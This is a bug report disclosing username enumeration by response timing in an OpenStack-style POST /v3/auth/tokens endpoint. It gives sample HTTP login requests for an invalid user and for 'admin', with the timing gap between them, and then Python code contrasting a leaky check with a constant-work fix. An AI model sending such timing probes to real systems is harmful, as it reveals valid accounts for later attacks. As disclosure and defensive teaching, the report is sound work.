Comment 0 for bug 1795800

Andy Ngo (andyngo) wrote: Username enumeration via response timing difference

The response times for POST /v3/auth/tokens are significantly higher for valid usernames compared to those of invalid ones, making it possible to enumerate users on the system.

Examples:

# For invalid username
+ Request
POST /v3/auth/tokens HTTP/1.1
Host: hostname:5000
Connection: close
Content-Length: 141
Content-Type: application/json

{"auth":{"identity":{"methods": ["password"],"password":{"user":{"name": "nonexisting","domain":{"name": "Default"},"password": "devstacker"}}}}}

+ Response Time: <150ms

# For valid username ('admin' in this case)
+ Request
POST /v3/auth/tokens HTTP/1.1
Host: hostname:5000
Connection: close
Content-Length: 139
Content-Type: application/json

{"auth":{"identity":{"methods": ["password"],"password":{"user":{"name": "admin","domain":{"name": "Default"},"password": "devstacker"}}}}}

+ Response time: >600ms

# Tested version
v3.8
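The mechanism behind the timing gap reported above (an early return when the user does not exist, versus a full password-hash computation when it does) and the usual mitigation, shown as an added Python example that is not Keystone's code; the user store, hash parameters and function names are constructed for illustration:

```python
import hashlib
import hmac
import os

# Constructed sample user store (name -> (salt, digest)); not Keystone's schema.
_ITERATIONS = 50_000


def _hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, _ITERATIONS)


_SALT = os.urandom(16)
USERS = {"admin": (_SALT, _hash_password("devstacker", _SALT))}

# Dummy record with the SAME algorithm and cost as real records, used for
# unknown users so that both code paths perform equal work.
_DUMMY_SALT = b"\x00" * 16
_DUMMY_HASH = _hash_password("dummy-placeholder", _DUMMY_SALT)

HASH_CALLS = {"count": 0}  # instrumentation: how many expensive hashes each path runs


def _hash_counted(password: str, salt: bytes) -> bytes:
    HASH_CALLS["count"] += 1
    return _hash_password(password, salt)


def authenticate_leaky(name: str, password: str) -> bool:
    """Vulnerable pattern: unknown user returns before any hashing (fast path)."""
    record = USERS.get(name)
    if record is None:
        return False
    salt, digest = record
    return hmac.compare_digest(_hash_counted(password, salt), digest)


def authenticate_constant_work(name: str, password: str) -> bool:
    """Mitigated pattern: always hash; unknown users are compared to the dummy record."""
    record = USERS.get(name)
    known = record is not None
    salt, digest = record if known else (_DUMMY_SALT, _DUMMY_HASH)
    match = hmac.compare_digest(_hash_counted(password, salt), digest)
    # Non-short-circuit combine: only a known user with a matching password succeeds.
    return known & match


def hash_calls_for(fn, name: str, password: str) -> int:
    """Number of password-hash computations one authentication attempt performs."""
    before = HASH_CALLS["count"]
    fn(name, password)
    return HASH_CALLS["count"] - before
```

With the leaky function an invalid username costs zero hash computations and a valid one costs one, which is the measurable difference in the report; the constant-work version costs one in both cases.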